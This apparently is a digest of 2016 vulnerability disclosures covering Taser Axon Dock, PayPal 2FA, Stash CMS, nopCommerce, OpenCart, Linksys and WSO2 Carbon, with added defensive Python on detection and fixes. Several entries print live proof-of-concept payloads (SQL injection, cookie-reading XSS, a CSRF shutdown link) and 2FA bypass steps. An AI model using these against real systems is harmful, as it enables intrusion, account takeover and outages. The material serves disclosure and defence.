Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

2016-08-15 Thread reggie . dodd30
[TITLE]
Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

[CREDITS & AUTHORS]
Reginald Dodd
https://www.linkedin.com/in/reginalddodd

[VENDOR & PRODUCT]
Taser International Inc.
Axon Dock - Body-Worn Camera Docking Station
https://www.axon.io/products/dock

[SUMMARY]
The Axon Dock is the camera docking station component of Taser's body-worn 
camera system. It charges body-worn cameras and automatically uploads videos to 
Taser's Evidence.com after body-worn cameras are stored onto it. System owners 
can remotely manage the dock through a web browser by navigating to 
http://. Remote unauthenticated users can obtain administrator access and 
reconfigure the Axon Dock.

[DESCRIPTION]
The Axon Dock stores its core management files in the http:///lua/ 
directory. These files are not protected with basic authentication. Remote 
unauthenticated users can send HTTP POST requests to any of these files: 
* http:///lua/set-passwd.lua
* http:///lua/set-config.lua
* http:///lua/reset-reg.lua
* http:///lua/etm-reboot.lua
* http:///lua/ssl-regen.lua
* http:///lua/diag-cmd.lua
* http:///lua/dvr-update.lua

Once an HTTP POST request with the proper payload body is sent to those files, 
they will allow remote unauthenticated users to:
* Change the password of the default and unchangeable user named "admin".
* Change the network configuration.
* Reveal body-worn camera owner real names, typically law enforcement officers.
* De-register an Axon Dock from Evidence.com to possibly disrupt or 
disassociate video uploads.
* Reboot an Axon Dock.
* Regenerate the SSL certificate.
* Run diagnostics on the Axon Dock.
* Update the firmware of the Axon Dock and any attached cameras.
* Repair any attached cameras.
* It was discovered that an intentionally hidden feature could allow users to 
transfer body-worn camera videos to any ftp server other than evidence.com. The 
HTML DIV tag of this feature was hidden with CSS (display:none). This feature 
uses ftp to transfer videos. It is accessible to remote unauthenticated users 
as well. The device uses the /lua/set-config.lua file to enable this feature. I 
created an ftp server to test it. The ftp credentials were sent via the GUI and 
re-sent several times via Burp Suite. I was able to enable it, but it 
constantly showed as not being properly configured (red instead of green 
status). I did not notice any network traffic in Wireshark on the ftp port of 
my ftp server. However, I did not have a body-worn camera available to 
accurately confirm that this feature does not work.

[AFFECTED VERSIONS] 
Vulnerable Version(s): 3.1.160322.2252 and possibly all prior versions
Fixed Version: Version 3.2.160726.1852

[SOLUTION]
Taser stated that they would centrally push out version 3.2.160726.1852 to all 
Axon Docks on August 8, 2016. If your dock is not updated, try to update the 
dock manually in the firmware section of the remote console. Contact Taser if 
you have any complications.

[TIMELINE]
July 18-20, 2016 - Discovered and validated with multiple exploits.
July 21, 2016 - My findings and exploits were disclosed to Taser. They 
immediately acknowledged the issues.
July 22, 2016 - Taser stated that a fix would be available in 2 weeks.
July 31, 2016 - CVE-ID was requested from MITRE.
August 1, 2016 - MITRE denied the CVE-ID request.
August 8, 2016 - Allegedly, the fix was to be centrally pushed on this day. 
However, no docks that were accessible to me were updated.
August 12, 2016 - Received reports that some docks were updated with the fix.
August 13, 2016 - Taser sent a confirmation email stating that "all" docks have 
been updated with the fix.
August 15, 2016 - Public Disclosure.
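As an added illustration (not part of the advisory above or of Taser's software), the following Python script shows how an operator could spot the unauthenticated management POSTs described above in the access log of a reverse proxy or network tap placed in front of a dock's web console. The Common Log Format, the sample log lines and the trusted-host list are assumptions made here; the endpoint list is the one given in the advisory.

```python
import re
from collections import Counter

# Management scripts the advisory lists as reachable with an unauthenticated POST.
AXON_DOCK_MGMT_ENDPOINTS = {
    "/lua/set-passwd.lua",
    "/lua/set-config.lua",
    "/lua/reset-reg.lua",
    "/lua/etm-reboot.lua",
    "/lua/ssl-regen.lua",
    "/lua/diag-cmd.lua",
    "/lua/dvr-update.lua",
}

# Common Log Format as written by a reverse proxy or tap in front of the dock's
# web console (assumed deployment; the dock itself is not known to log this).
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_clf(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # compare the path without the query string
    return rec


def find_mgmt_posts(lines, trusted_admin_hosts=frozenset()):
    """Return (src, path, ts, status) for every POST to a management script that
    did not come from a host on the trusted administration list."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] in AXON_DOCK_MGMT_ENDPOINTS and rec["src"] not in trusted_admin_hosts:
            findings.append((rec["src"], rec["path"], rec["ts"], rec["status"]))
    return findings


def posts_per_source(findings):
    """Count flagged requests per source address for triage."""
    return Counter(src for src, _path, _ts, _status in findings)


# Constructed sample log lines (not captured from a real dock).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2016:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Aug/2016:09:12:07 +0000] "POST /lua/set-passwd.lua HTTP/1.1" 200 87',
    '10.0.0.5 - - [10/Aug/2016:09:12:30 +0000] "POST /lua/reset-reg.lua HTTP/1.1" 200 40',
    '192.0.2.10 - - [10/Aug/2016:09:15:00 +0000] "POST /lua/set-config.lua?save=1 HTTP/1.1" 200 60',
    '10.0.0.99 - - [10/Aug/2016:09:16:00 +0000] "GET /lua/set-config.lua HTTP/1.1" 200 60',
    'not a log line',
]

if __name__ == "__main__":
    for hit in find_mgmt_posts(SAMPLE_LOG, trusted_admin_hosts={"192.0.2.10"}):
        print("unexpected management POST:", hit)
```

A GET to the same scripts is deliberately not flagged: the advisory describes the POST handlers as the unauthenticated entry point, and alerting on every page load of the console would bury the signal.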


PayPal Inc BB #127 - 2FA Bypass Vulnerability

2016-08-15 Thread Vulnerability Lab
Document Title:
===
PayPal Inc BB #127 - 2FA Bypass Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1903


Release Date:
=
2016-08-12


Vulnerability Laboratory ID (VL-ID):

1903


Common Vulnerability Scoring System:

6.2


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders.

(Copy of the Homepage: www.paypal.com )


Abstract Advisory Information:
==
The independent vulnerability laboratory researcher (Shawar Khan) discovered a 
vulnerability in the official PayPal website (api) web-application.
The issue allows an attacker to bypass the 2-factor authentication and mobile 
confirmation which could lead to unauthorized access.



Vulnerability Disclosure Timeline:
==
2016-05-13: Researcher Notification & Coordination (Shawar Khan)
2016-05-14: Vendor Notification (PayPal Inc Bug Bounty Program - Security Team)
2016-05-24: Vendor Response/Feedback (PayPal Inc Bug Bounty Program - Security 
Team)
2016-07-10: Vendor Fix/Patch (PayPal Inc Developer Team)
2016-07-18: Acknowledgements (PayPal Inc Bug Bounty Program - Security Team)
2016-08-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: PayPal - Online Service Web Application 2016 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A 2-Factor Authentication Bypass Vulnerability was discovered in the official 
PayPal website (api) web-application.

This vulnerability allows an attacker to bypass the 2FA mechanism for access to 
PayPal accounts without verifying the identity with confirmation in the basic 
procedure. The security vulnerability is located in the PayPal login portals of 
the UK site and the PayPal preview. Each portal has an issue which can lead to 
a full bypass once used in a combined way.

If the user has 2FA activated in his account, whenever the user logs into his 
account, PayPal will ask the user to verify his identity. Verification can be 
made via phone number or by confirming the login request via the PayPal mobile 
app (api). The mechanism mainly prevents unauthorized access to the account and 
provides an extra layer of security.

The login portal of PayPal preview is missing the verification mechanism. When 
a user is logged in via PayPal preview's login portal, the user is logged in 
without any verification and the login is successful, but there are no settings 
or anything of interest. When logged in via the PayPal UK login portal, it 
checks whether the user account is already signed in from any other portal or 
not. Once it checks that the user is already logged in via PayPal preview 
(without verification), it allows us access to the account without any kind of 
verification. This is how 2FA was bypassed in PayPal due to lack of 2FA 
protection.


Proof of Concept (PoC):
===
PayPal uses an additional layer of security known as 2-Factor Authentication, 
which is used to verify the user's identity so no unauthorized access would be 
allowed. The mechanism verifies the user's identity by calling or messaging a 
code to the phone number or by confirming the login via the Mobile App. Without 
these, the account cannot be accessed. By following the procedure below the 2FA 
protection can be bypassed:


Site: PayPal ( www.paypal.com )
PayPal UK Login Portal: https://www.paypal.com/uk/cgi-bin/?cmd=_email_receipt
PayPal Preview Login Portal: 
https://www.paypal.com/webapps/garden/page/garden.form


Steps to reproduce:
1. Open the PayPal UK Login Portal in a new tab (keep it open)
2. In the other tab, open the PayPal Preview Login Portal
3. Log in to your account at the URL which is opened in step 2
4. Enter credentials in the new window which appears
5. Refresh the page which was opened in step 1
6. Now you will be logged in. Click on the "view account" button, which will 
lead you to your account, and the 2-step verification will be bypassed


Solution - Fix & Patch:
===
In every login portal, verification checks must be deployed even if the user 
is already logged in. 
This will prevent unauthorized access to the account.


Security Risk:
==
This vulnerability allows an attacker to bypass the 2-factor authentication and 
mobile confirmation 
which could lead to unauthorized access.


Credits & Authors:
==
Shawar Khan - (https://shawarkhan.com) 
[http://www.vulnerability-lab.com/show.php?user=Shawar%20Khan]
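The following Python model is an added illustration of the design flaw the advisory describes and of the fix it proposes; it is not PayPal's code and does not claim to reflect PayPal's implementation. The account, session and portal functions are constructed here: one portal authenticates by password only and never sets the second-factor flag, the "vulnerable" account view trusts any authenticated session, and the "fixed" view re-checks the verification state for every portal.

```python
from dataclasses import dataclass


@dataclass
class Account:
    username: str
    password: str          # plain text only because this is a toy model
    two_factor_enabled: bool


@dataclass
class Session:
    username: str
    authenticated: bool = False   # password accepted
    mfa_verified: bool = False    # phone code or app confirmation completed


class AccessDenied(Exception):
    pass


def preview_portal_login(account, session, password):
    """Models the preview portal: it verifies the password but never asks for
    the second factor, so the shared session is only password-authenticated."""
    if password != account.password:
        raise AccessDenied("bad password")
    session.authenticated = True
    return session


def complete_second_factor(session, confirmation_ok):
    """Models the phone-code / mobile-app confirmation step."""
    if not confirmation_ok:
        raise AccessDenied("second factor failed")
    session.mfa_verified = True
    return session


def uk_portal_view_account_vulnerable(account, session):
    """The reported behaviour: an existing session from any portal is enough."""
    if not session.authenticated:
        raise AccessDenied("login required")
    return "account page for %s" % account.username


def uk_portal_view_account_fixed(account, session):
    """The advisory's recommended fix: every portal checks the verification
    state itself, even for a session that is already logged in."""
    if not session.authenticated:
        raise AccessDenied("login required")
    if account.two_factor_enabled and not session.mfa_verified:
        raise AccessDenied("second factor required")
    return "account page for %s" % account.username


def walk_through(two_factor_enabled=True):
    """Runs the advisory's sequence against both checks and reports what each did."""
    account = Account("alice", "correct horse", two_factor_enabled)
    session = Session("alice")
    preview_portal_login(account, session, "correct horse")  # login via the preview portal
    result = {"vulnerable": uk_portal_view_account_vulnerable(account, session)}
    try:
        uk_portal_view_account_fixed(account, session)
        result["fixed"] = "granted"
    except AccessDenied as e:
        result["fixed"] = str(e)
    complete_second_factor(session, confirmation_ok=True)
    result["fixed_after_mfa"] = uk_portal_view_account_fixed(account, session)
    return result
```

The point of the model is that "logged in" and "verified" are separate session states: a portal that grants access on the first alone inherits the weakest login path of every other portal that shares the session.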


Stash v1.0.3 CMS - SQL Injection Vulnerability

2016-08-15 Thread Vulnerability Lab
Document Title:
===
Stash v1.0.3 CMS - SQL Injection Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1899


Release Date:
=
2016-08-10


Vulnerability Laboratory ID (VL-ID):

1899


Common Vulnerability Scoring System:

6


Product & Service Introduction:
===
Stash is a free content management system (CMS). It is written in PHP and uses 
MySQL. It is distributed under the Creative Commons License.


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the official Stash v1.0.3 content management 
system.


Vulnerability Disclosure Timeline:
==
2016-08-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Stash
Product: Stash - Content Management System (Web-Application) 1.0.3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql-injection web vulnerability has been discovered in the official 
phpCollab v2.5 content management system.
The vulnerability allows remote attackers to execute their own malicious sql 
commands to compromise the application or dbms.

The sql-injection vulnerability is located in the `id` parameter of the 
`./stash/admin/` module GET method request. Remote attackers are able to 
execute their own sql commands by usage of the insecure `usersedit.php` file 
GET method request. The attack vector of the vulnerability is application-side 
and the request method to inject is GET. The vulnerability is a classic select 
remote sql-injection.

The security risk of the vulnerability is estimated as high with a cvss (common 
vulnerability scoring system) count of 6.0.
Exploitation of the remote sql injection vulnerability requires no user 
interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./stash/admin/

Vulnerable File(s):
[+] usersedit.php

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
without a privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability, 
follow the provided information and steps below to continue.


PoC: Exploitation
http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION VULNERABILITY!]--


--- Error Exception Logs [SQL] ---
Query error: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near 
''1''' at line 1


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION VIA ID PARAMETER!]-- 
Mime Type[text/html]
   Request Header:
  Host[stash.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 
Firefox/47.0]
  Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470585963.1470585617.; _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fstash.localhost:8000%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
  Connection[keep-alive]
   Response Header:
  Server[nginx/1.2.1]
  Date[Sun, 07 Aug 2016 16:06:03 GMT]
  Content-Type[text/html]
  Transfer-Encoding[chunked]
  Connection[keep-alive]
  X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]


Reference(s):
http://stash.localhost:8000/
http://stash.localhost:8000/stash/
http://stash.localhost:8000/stash/admin/
http://stash.localhost:8000/stash/admin/usersedit.php


Solution - Fix & Patch:
===
The sql-injection web vulnerability in the application can be patched by usage 
of a prepared statement in the vulnerable usersedit.php file GET method request.
Disallow the usage of special chars and escape the input/output context of the 
module to prevent further sql-injection attacks.


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
usersedit.php file GET method request is estimated as high. (CVSS 6.0)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=
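Added illustration (not Stash code, not part of the advisory) of the "prepared statement" fix the Solution section calls for, using Python and an in-memory SQLite table standing in for the CMS users table. `load_user_vulnerable` splices the `id` parameter into the SQL text the way the advisory describes; `load_user_fixed` binds it as a parameter and, because the id is numeric by design, rejects anything that is not an integer before the query runs. The table contents and function names are constructed for the example.

```python
import sqlite3


def make_demo_db():
    """In-memory stand-in for the CMS users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "editor")],
    )
    return conn


def load_user_vulnerable(conn, user_id):
    """Models the flaw: the GET parameter is spliced into the SQL text, so a
    quote inside `id` changes the statement instead of the value."""
    sql = "SELECT id, name, role FROM users WHERE id = '%s'" % user_id
    return conn.execute(sql).fetchone()


def load_user_fixed(conn, user_id):
    """Prepared statement plus type check: the parameter can only ever be a value."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return None  # the id is numeric by design; anything else is rejected outright
    return conn.execute(
        "SELECT id, name, role FROM users WHERE id = ?", (uid,)
    ).fetchone()


def run_demo():
    """Sends the advisory's `-1'` probe and a normal id through both versions."""
    conn = make_demo_db()
    out = {
        "fixed_probe": load_user_fixed(conn, "-1'"),
        "fixed_normal": load_user_fixed(conn, "2"),
        "vulnerable_normal": load_user_vulnerable(conn, "2"),
    }
    try:
        load_user_vulnerable(conn, "-1'")
        out["vulnerable_probe"] = "query ran"
    except sqlite3.OperationalError as e:
        # Same symptom as the advisory's error log: the quote breaks the SQL syntax
        out["vulnerable_probe"] = "sql error: %s" % e
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The syntax error the vulnerable version produces is exactly the signal the advisory's error log shows; in the fixed version the same input never reaches the database engine as SQL.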

Reflected Cross Site Scripting (XSS) Vulnerability in nopcommerce 3.70

2016-08-15 Thread tal argoni
Security Advisory
CVE-ID:              N/A
Topic:               Reflected Cross Site Scripting (XSS) Vulnerability in
                     "successful registration" page
Class:               Input Validation
Severity:            Medium
Discovery:           2016-04-28
Vendor Notification: 2016-04-28
Vendor response:     2016-05-30
Vendor Patch:        2016-05-31
Public Announced:    2016-08-15
Credits:             Tal Argoni, CEH from Triad Security [http://www.triadsec.com/]
Affects:             nopCommerce, open-source & free e-commerce solution 3.70
Resolved:            Version 3.8

I. Background
nopCommerce is an open-source e-commerce shopping cart web application written
in MVC.NET. After an anonymous user successfully registers with the
application, the application returns to the user a successful registration
page with a "continue to the shop" button. The redirection parameter's
(returnurl) value is supplied by the user and echoed without output validation
to the browser.

II. Problem Description
Reflected cross-site scripting vulnerabilities arise when data is copied from a
request and echoed into the application's immediate response in an unsafe way.
The injected code is not stored within the application itself; it only impacts
users who open a maliciously crafted link or third-party web page. The attack
string is included as part of the crafted URI or HTTP parameters, improperly
processed by the application, and returned to the victim.
Exploit code/POC:
http://VulnopCommerce/registerresult/1?returnurl=%2fcustomer%2finfo'%3balert("hacked+by+triad+security")%3b%2f%2f

III. Impact
The attacker-supplied code can perform a wide variety of actions, such as
stealing the victim's session token or login credentials, performing arbitrary
actions on the victim's behalf, and logging their keystrokes.
IV. Workaround
You can work around this problem by doing the following:
1. It is recommended to use HTML encoding at any point where user input is
copied into application responses.

V. Solution
Download vendor patch from http://www.nopcommerce.com .
Update to version 3.8

VI. References
http://www.triadsec.com/
https://www.linkedin.com/in/talargoni
https://github.com/nopSolutions/nopCommerce/commit/364091c16bae533a6c00c0f3bd920ed15da25f77
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


Linksys E2500 and E1200 (Unauth Command Injection)

2016-08-15 Thread samhuntley84
Linksys E2500 and E1200 suffer from a command injection issue in the parental 
control parameters. This allows an attacker to take control of the device 
remotely.

Combined with the missing authorization control, this allows an attacker to 
execute an unauthenticated command injection attack and thus control the 
entire device.

More info at:
http://www.samuelhuntley.com/?p=141
http://www.samuelhuntley.com/?p=135

Initial disclosure date: 04/12/16
Fixed date as per Linksys contact: 7/4/16
Linksys contact: Benjamin Samuels,  Calvin Clark (secur...@linksys.com)


Linksys E1200 and E2500 (Missing authorization on parental control)

2016-08-15 Thread samhuntley84


Linksys E1200 hardware version 2.2 and firmware version 2.0.07 (build 2) suffer 
from missing authorization control on the parental control page. This allows an 
attacker to change the parental controls set up by parents to keep kids safe 
from visiting adult sites and probably compromise a kid’s device.

Info at 
http://www.samuelhuntley.com/?p=132
http://www.samuelhuntley.com/?p=143

Initial disclosure date: 04/12/16
Fixed date as per Linksys contact: 7/4/16
Linksys contact: Benjamin Samuels,  Calvin Clark (secur...@linksys.com)


OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)

2016-08-15 Thread hamedizadi
###

# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability

###

Information

Author: Hamed Izadi 
Email: array("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important


Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged-in user's session. This means that the malicious hacker can change
the logged-in user's password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator's session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.0.3.1:

/opencart/index.php?route=product/product_id=1
(product_id - GET)

XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//

Example: 
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//

After opening the above URL, click on the "Add to Wish List" and "Compare this 
Product" icons, and view the alert window.
 



Solution

Upgrade to newer version


Credits & Authors

These issues have been discovered by Hamed Izadi



###

# Iran

# L U Arg

###
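Added example (my own Python, not nopCommerce or OpenCart code) covering the two reflected-XSS reports above, which differ in where the parameter lands: nopCommerce's returnurl is echoed into an HTML attribute, while the OpenCart payload (`');window[...](/XSS/);//`) closes a JavaScript string literal inside an inline script. The fix is context-specific output encoding: HTML-escape (quotes included) for the attribute, plus accepting only a site-relative path for a redirect target; JSON-encode for the JavaScript string, with `<` and `/` escaped so a `</script>` in the value cannot end the block. The rendering functions, the `wishlist.add(...)` call and the sample payloads are constructed for the example.

```python
import html
import json
from urllib.parse import urlsplit


def safe_return_url(returnurl, default="/"):
    """Accept only a site-relative path for the post-registration redirect;
    empty values, absolute URLs and scheme-relative '//host' fall back to the default."""
    if not returnurl or not returnurl.startswith("/") or returnurl.startswith("//"):
        return default
    parts = urlsplit(returnurl)
    if parts.scheme or parts.netloc:
        return default
    return returnurl


def render_register_result_unsafe(returnurl):
    """The pattern the nopCommerce advisory describes: the parameter is echoed as-is."""
    return '<a href="%s">continue to the shop</a>' % returnurl


def render_register_result_safe(returnurl):
    """HTML-attribute context: validate the target, then HTML-encode with quotes."""
    url = html.escape(safe_return_url(returnurl), quote=True)
    return '<a href="%s">continue to the shop</a>' % url


def js_string_literal(value):
    """JS-string context: JSON encoding yields a valid JS string literal; '<' and
    '/' are additionally escaped so '</script>' inside the value stays inert."""
    return json.dumps(str(value)).replace("<", "\\u003c").replace("/", "\\/")


def render_product_script_unsafe(product_id):
    """The pattern behind the OpenCart PoC: a parameter dropped into inline JS."""
    return "<script>wishlist.add('%s');</script>" % product_id


def render_product_script_safe(product_id):
    """Same markup, but the value is a proper JS string literal whatever it contains."""
    return "<script>wishlist.add(%s);</script>" % js_string_literal(product_id)


if __name__ == "__main__":
    print(render_register_result_safe("/customer/info';alert(1);//"))
    print(render_product_script_safe("1');alert(1);//"))
```

HTML encoding alone would not have helped in the OpenCart case: `&#x27;` is meaningless inside a script block, which is why the encoder has to match the context the value is written into.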



WSO2-CARBON v4.4.5 CSRF / DOS

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt

[+] ISR: ApparitionSec


Vendor:

www.wso2.com



Product:
==
WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Cross Site Request Forgery / DOS



CVE Reference:
==
CVE-2016-4315




Vulnerability Details:
=

The attack involves tricking a privileged user to initiate a request by 
clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101


The getSafeText() function and the conditional logic below process the "action" 
parameter with no check for inbound CSRF attacks.

String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);

// The action is dispatched straight from the request parameter: no CSRF token
// and no restriction on the request method precede the calls below.
try {
    if ("restart".equals(action)) {
        client.restart();
    } else if ("restartGracefully".equals(action)) {
        client.restartGracefully();
    } else if ("shutdown".equals(action)) {
        client.shutdown();
    } else if ("shutdownGracefully".equals(action)) {
        client.shutdownGracefully();
    }
} catch (Exception e) {
    response.sendError(500, e.getMessage());
    return;
}



Exploit code(s):
===
  
Shut down the Carbon server:

<a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;">Shut it down!</a>



Disclosure Timeline:
==
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
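Added example (my own Python, not WSO2 code) of the check the dispatch logic above lacks. It models the same four actions behind a synchronizer-token pattern: the admin page obtains a per-session random token, and the handler runs an action only for a POST that carries a token matching the session's, compared in constant time. `ServerAdminClient` here is a constructed stand-in that records calls instead of restarting anything; the session is a plain dict and the parameter names are assumptions.

```python
import hmac
import secrets


class ServerAdminClient:
    """Constructed stand-in for WSO2's ServerAdminClient: records the calls
    instead of restarting or shutting anything down."""

    def __init__(self):
        self.calls = []

    def restart(self):
        self.calls.append("restart")

    def restartGracefully(self):
        self.calls.append("restartGracefully")

    def shutdown(self):
        self.calls.append("shutdown")

    def shutdownGracefully(self):
        self.calls.append("shutdownGracefully")


CSRF_SESSION_KEY = "csrf_token"


def issue_csrf_token(session):
    """Synchronizer token: one unguessable value per session, embedded in the
    admin page's form and compared on every state-changing request."""
    token = session.get(CSRF_SESSION_KEY)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[CSRF_SESSION_KEY] = token
    return token


def csrf_token_valid(session, submitted):
    expected = session.get(CSRF_SESSION_KEY)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time comparison


def server_admin_action(session, client, method, params):
    """Hardened version of the dispatch shown in the advisory: the action only
    runs for a POST carrying the session's token. Returns (status, message)."""
    if method != "POST":
        return 405, "state-changing actions require POST"
    if not csrf_token_valid(session, params.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    handlers = {
        "restart": client.restart,
        "restartGracefully": client.restartGracefully,
        "shutdown": client.shutdown,
        "shutdownGracefully": client.shutdownGracefully,
    }
    handler = handlers.get(params.get("action"))
    if handler is None:
        return 400, "unknown action"
    handler()
    return 200, "action %s executed" % params["action"]


def run_demo():
    """Replays the advisory's link (a GET with action=shutdown), a forged POST
    without the token, a POST with a wrong token, and a legitimate POST."""
    session = {}
    client = ServerAdminClient()
    results = [server_admin_action(session, client, "GET", {"action": "shutdown"}),
               server_admin_action(session, client, "POST", {"action": "shutdown"})]
    token = issue_csrf_token(session)
    results.append(server_admin_action(session, client, "POST",
                                       {"action": "shutdown", "csrf_token": "guess"}))
    results.append(server_admin_action(session, client, "POST",
                                       {"action": "shutdown", "csrf_token": token}))
    return [status for status, _msg in results], client.calls
```

Refusing GET on its own defeats the plain link in the PoC but not a forged form on an attacker's page, which is why the token check is the part that matters.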


WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt

[+] ISR: ApparitionSec


Vendor:
=
www.wso2.com



Product:
==
WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
===
Persistent / Reflected
Cross Site Scripting (XSS) - Cookie Disclosure



CVE Reference:
==
CVE-2016-4316



Vulnerability Details:
=

WSO2 Carbon has multiple XSS vectors allowing attackers to inject client-side 
scripts into web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access 
controls such as the same-origin policy, steal session cookies and serve as a 
platform for further attacks on the system.


Exploit code(s)
===


Persistent XSS:

GET Request
https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie)
   


Request two is POST
/carbon/identity-mgt/challenges-mgt-finish.jsp

